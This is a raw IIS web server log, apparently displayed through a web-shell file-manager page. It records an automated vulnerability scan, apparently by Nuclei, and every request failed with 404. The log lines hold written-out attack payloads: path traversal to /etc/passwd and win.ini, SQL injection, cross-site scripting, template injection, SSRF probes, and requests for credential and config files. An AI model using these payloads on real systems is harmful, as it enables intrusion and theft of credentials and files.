????

Your IP : 3.144.235.50


Current Path : C:/inetpub/logs/wmsvc/W3SVC1/
Upload File :
Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex230626.log

#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 00:03:36
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 00:03:36 103.153.214.94 GET /backup/auto.php password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 29
2023-06-26 00:07:10 103.153.214.94 GET /passwordrecovered.cgi id=nuclei 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 33
2023-06-26 00:14:02 103.153.214.94 GET /api/geojson url=file:///etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 28
2023-06-26 00:16:42 103.153.214.94 GET /admin/ date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN&page=reports 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 26
2023-06-26 00:17:34 103.153.214.94 GET /learn/cubemail/filemanagement.php action=dl&f=../../../../../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 29
2023-06-26 00:21:42 103.153.214.94 POST /node/1 _format=hal_json 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 26
2023-06-26 00:23:38 103.153.214.94 POST /admin/ajax.php action=login 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 36
2023-06-26 00:23:38 103.153.214.94 GET /admin/manage_user.php id=-1%20union%20select%201,md5(999999999),3,4,5--+ 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 23
2023-06-26 00:28:06 103.153.214.94 GET /wp-content/plugins/aspose-importer-exporter/aspose_import_export_download file=../../../wp-config.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 29
2023-06-26 00:28:16 103.153.214.94 GET /ws-config.json - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 22
2023-06-26 00:28:16 103.153.214.94 GET /ws-config.example.json - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 27
2023-06-26 00:39:30 103.153.214.94 GET /etc/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 26
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 00:57:29
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 00:57:29 103.153.214.94 POST /xmlpserver/ReportTemplateService.xls - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 29
2023-06-26 00:59:58 103.153.214.94 GET /rest/api/latest/repos - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 28
2023-06-26 01:03:42 103.153.214.94 GET /e/ViewImg/index.html url=javascript:alert(1) 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 24
2023-06-26 01:09:14 103.153.214.94 GET /WAN_wan.htm .gif 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 28
2023-06-26 01:09:14 103.153.214.94 GET /WAN_wan.htm .gif 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 25
2023-06-26 01:14:54 103.153.214.94 GET /installer/installerUI.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2228.0+Safari/537.36 - 404 7 0 47
2023-06-26 01:26:02 103.153.214.94 POST /wp-admin/admin-ajax.php - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 28
2023-06-26 01:37:52 103.153.214.94 GET /include/thumb.php dir=http/.....///.....///config/config_db.php 8172 - 45.117.82.231 Mozilla/5.0+(X11;+OpenBSD+i386)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.125+Safari/537.36 - 404 7 0 30
2023-06-26 01:37:52 103.153.214.94 GET /include/thumb.php dir=.....///http/.....///config/config_db.php 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 25
2023-06-26 01:37:53 103.153.214.94 GET /include/thumb.php dir=http\\..\\..\\config\\config_db.php 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 24
2023-06-26 01:43:52 103.153.214.94 GET /wifi_base.shtml - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 55
2023-06-26 01:55:40 103.153.214.94 GET /classes/phpmailer/class.cs_phpmailer.php classes_dir=../../../../../../../../../../../etc/passwd%00 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 26
2023-06-26 01:57:29 103.153.214.94 GET /wp/wp-content/uploads/wpjobboard/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 26
2023-06-26 01:57:29 103.153.214.94 GET /wp-content/uploads/wpjobboard/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 23
2023-06-26 02:03:24 103.153.214.94 GET /api/sitecore/Sitecore.Mvc.DeviceSimulator.Controllers.SimulatorController,Sitecore.Mvc.DeviceSimulator.dll/Preview previewPath=/App_Data/license.xml 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 28
2023-06-26 02:13:10 103.153.214.94 GET /index.php controller=../../../../../../../etc/passwd%00&option=com_shoutbox 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.1+Safari/537.36 - 404 7 0 27
2023-06-26 02:16:00 103.153.214.94 GET /index.php controller=../../../../../../../../../../../../../etc/passwd%00&option=com_dioneformwizard 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 25
2023-06-26 02:19:57 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 0 0 44
2023-06-26 02:25:35 103.153.214.94 GET /sftp-config.json - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 25
2023-06-26 02:25:35 103.153.214.94 GET /ftpsync.settings - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 24
2023-06-26 02:29:14 103.153.214.94 GET /pmb/opac_css/getgif.php chemin=../../../../../../etc/passwd&nomgif=nuclei 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 28
2023-06-26 02:32:29 103.153.214.94 GET /plugins/servlet/snjFooterNavigationConfig fileMime=$textMime&fileName=../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 33
2023-06-26 02:33:12 103.153.214.94 GET /monitoring graph=usedMemory%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&part=graph 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 30
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 02:49:38
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 02:49:38 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../windows/win.ini - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 0 0 54
2023-06-26 02:49:38 103.153.214.94 GET /.../.../.../.../.../.../.../.../.../etc/passwd - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 0 0 39
2023-06-26 02:50:04 103.153.214.94 GET /index.php page=../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2224.3+Safari/537.36 - 404 7 0 23
2023-06-26 03:00:06 103.153.214.94 GET /index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
2023-06-26 03:00:06 103.153.214.94 GET /pma/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_10_1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2062.124+Safari/537.36 - 404 7 0 24
2023-06-26 03:00:06 103.153.214.94 GET /pmd/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23
2023-06-26 03:00:06 103.153.214.94 GET /phpMyAdmin/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 23
2023-06-26 03:00:06 103.153.214.94 GET /phpmyadmin/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 64
2023-06-26 03:00:07 103.153.214.94 GET /_phpmyadmin/index.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 24
2023-06-26 03:02:19 103.153.214.94 GET /index.php controller=../../../../../../../../../../etc/passwd%00&option=com_noticeboard 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 25
2023-06-26 03:03:10 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 27
2023-06-26 03:03:10 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 22
2023-06-26 03:03:10 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 22
2023-06-26 03:03:10 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.4;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 24
2023-06-26 03:03:10 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 24
2023-06-26 03:03:10 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23
2023-06-26 03:03:10 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 23
2023-06-26 03:03:10 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 25
2023-06-26 03:03:10 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 23
2023-06-26 03:03:11 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 24
2023-06-26 03:03:11 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 22
2023-06-26 03:03:11 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 27
2023-06-26 03:03:11 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 23
2023-06-26 03:03:11 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 24
2023-06-26 03:03:11 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 23
2023-06-26 03:03:11 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 26
2023-06-26 03:03:11 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 24
2023-06-26 03:03:11 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1985.67+Safari/537.36 - 404 7 0 21
2023-06-26 03:03:11 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2226.0+Safari/537.36 - 404 7 0 24
2023-06-26 03:03:11 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.3319.102+Safari/537.36 - 404 7 0 24
2023-06-26 03:03:11 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 24
2023-06-26 03:03:12 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_4)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/49.0.2656.18+Safari/537.36 - 404 7 0 23
2023-06-26 03:03:12 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 22
2023-06-26 03:03:12 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 22
2023-06-26 03:03:12 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 25
2023-06-26 03:03:12 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 26
2023-06-26 03:03:12 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 22
2023-06-26 03:03:12 103.153.214.94 GET /jmx-console/ - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 24
2023-06-26 03:10:10 103.153.214.94 POST /RPC2 - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2117.157+Safari/537.36 - 404 7 0 27
2023-06-26 03:19:14 103.153.214.94 GET /cgi/get_param.cgi sys.passwd&sys.su.name&xml 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 - 404 7 0 29
2023-06-26 03:27:06 103.153.214.94 GET / - 8172 - 87.236.176.19 Mozilla/5.0+(compatible;+InternetMeasurement/1.0;++https://internet-measurement.com/) - 404 7 0 264
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 03:44:11
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 03:44:11 103.153.214.94 GET /index.php/video/ dl=aHR0cHM6Ly9vYXN0Lm1lLw== 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1847.137+Safari/4E423F - 404 7 0 28
2023-06-26 03:45:38 103.153.214.94 GET /wp-admin/admin-ajax.php action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 25
2023-06-26 03:47:26 103.153.214.94 GET /category_view.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 27
2023-06-26 03:47:26 103.153.214.94 GET /folder_view.php - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/40.0.2214.93+Safari/537.36 - 404 7 0 25
2023-06-26 04:01:50 103.153.214.94 GET /fed.rpc.solo.io.GlooInstanceApi/ListClusterDetails - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/89.0.4389.114+Safari/537.36 https://bcvt.kontum.gov.vn:8172/admin/ 404 7 0 30
2023-06-26 04:05:06 103.153.214.94 GET /ACSServer/WebServlet act=getMapImg_acs2&filename=../../../../../../../etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.1916.47+Safari/537.36 - 404 7 0 26
2023-06-26 04:05:06 103.153.214.94 GET /ACSServer/WebServlet act=getMapImg_acs2&filename=../../../../../../../windows/win.ini 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2762.73+Safari/537.36 - 404 7 0 23
2023-06-26 04:07:53 103.153.214.94 GET / - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2225.0+Safari/537.36 - 404 7 0 35
2023-06-26 04:11:24 103.153.214.94 GET /getCorsFile urlPath=aHR0cHM6Ly9vYXN0Lm1l 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.2;+WOW64)+AppleWebKit/537.36+(KHTML+like+Gecko)+Chrome/44.0.2403.155+Safari/537.36 - 404 7 0 24
2023-06-26 04:20:25 103.153.214.94 GET /login/forgetpswd.php loginname=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&loginsys=1 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/70.0.3538.77+Safari/537.36 - 404 7 0 27
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 04:37:39
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 04:37:38 103.153.214.94 GET /config.properties - 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_9_2)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/36.0.1944.0+Safari/537.36 - 404 7 0 29
2023-06-26 04:37:38 103.153.214.94 GET /config.properties.bak - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 24
2023-06-26 04:37:38 103.153.214.94 GET /ui_config.properties - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+i686+on+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/53.0.2820.59+Safari/537.36 - 404 7 0 25
2023-06-26 04:37:48 103.153.214.94 GET /wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php p=tout 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+4.0;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 28
2023-06-26 04:45:22 103.153.214.94 GET /ReportServer/Pages/ReportViewer.aspx - 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/35.0.2309.372+Safari/537.36 - 404 7 0 50
2023-06-26 04:49:33 103.153.214.94 GET /login - 8172 - 45.117.82.231 Mozilla/5.0+(X11;+Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/55.0.2919.83+Safari/537.36 - 404 7 0 27
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2023-06-26 05:06:59
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2023-06-26 05:06:59 103.153.214.94 GET /index.php controller=../../../../../../../../../etc/passwd&option=com_kif_nexus 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.1;+WOW64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/41.0.2227.0+Safari/537.36 - 404 7 0 26
2023-06-26 05:11:52 103.153.214.94 GET /WealthT24/GetImage docDownloadPath=/etc/passwd 8172 - 45.117.82.231 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_8_3)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/54.0.2866.71+Safari/537.36 - 404 7 0 26
2023-06-26 05:11:52 103.153.214.94 GET /WealthT24/GetImage docDownloadPath=c:/windows/win.ini 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+5.1)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/34.0.1866.237+Safari/537.36 - 404 7 0 22
2023-06-26 05:18:38 103.153.214.94 GET /oauth/authorize client_id=acme&redirect_uri=http://test&response_type=${13337*73331}&scope=openid 8172 - 45.117.82.231 Mozilla/5.0+(Windows+NT+6.3;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/37.0.2049.0+Safari/537.36 - 404 7 0 30
